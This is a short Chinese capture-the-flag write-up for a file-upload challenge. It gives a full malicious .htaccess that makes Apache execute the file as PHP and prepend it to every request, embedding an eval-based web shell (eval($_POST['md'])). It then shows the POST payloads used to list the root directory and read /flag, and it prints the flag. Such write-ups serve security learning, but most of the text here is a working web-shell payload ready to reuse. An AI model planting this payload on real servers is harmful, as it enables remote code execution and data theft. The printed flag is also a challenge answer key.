题目

上传.htaccess就是修改配置文件

<FilesMatch .htaccess>
SetHandler application/x-httpd-php 
Require all granted  
php_flag engine on	
</FilesMatch>

php_value auto_prepend_file .htaccess
#<?php eval($_POST['md']);?>

SetHandler和ForceType
强制所有匹配的文件被一个指定的处理器处理 用法：

ForceType application/x-httpd-php
SetHandler application/x-httpd-php

那么这里就是将.htaccess文件解析为php

Require all granted  #允许所有请求
php_flag engine on   #开启PHP的解析
php_value auto_prepend_file .htaccess 在主文件解析之前自动解析包含.htaccess的内容

md=var_dump(scandir("/"));

md=var_dump(file_get_contents("/flag"));

 执行命令绕过获取flag

拿下flag

flag{07793544-65b6-4613-be56-3574d880120f} 

这样做似乎有点局限性就是隔一段时间就得重新上传.htaccess文件才能解析成功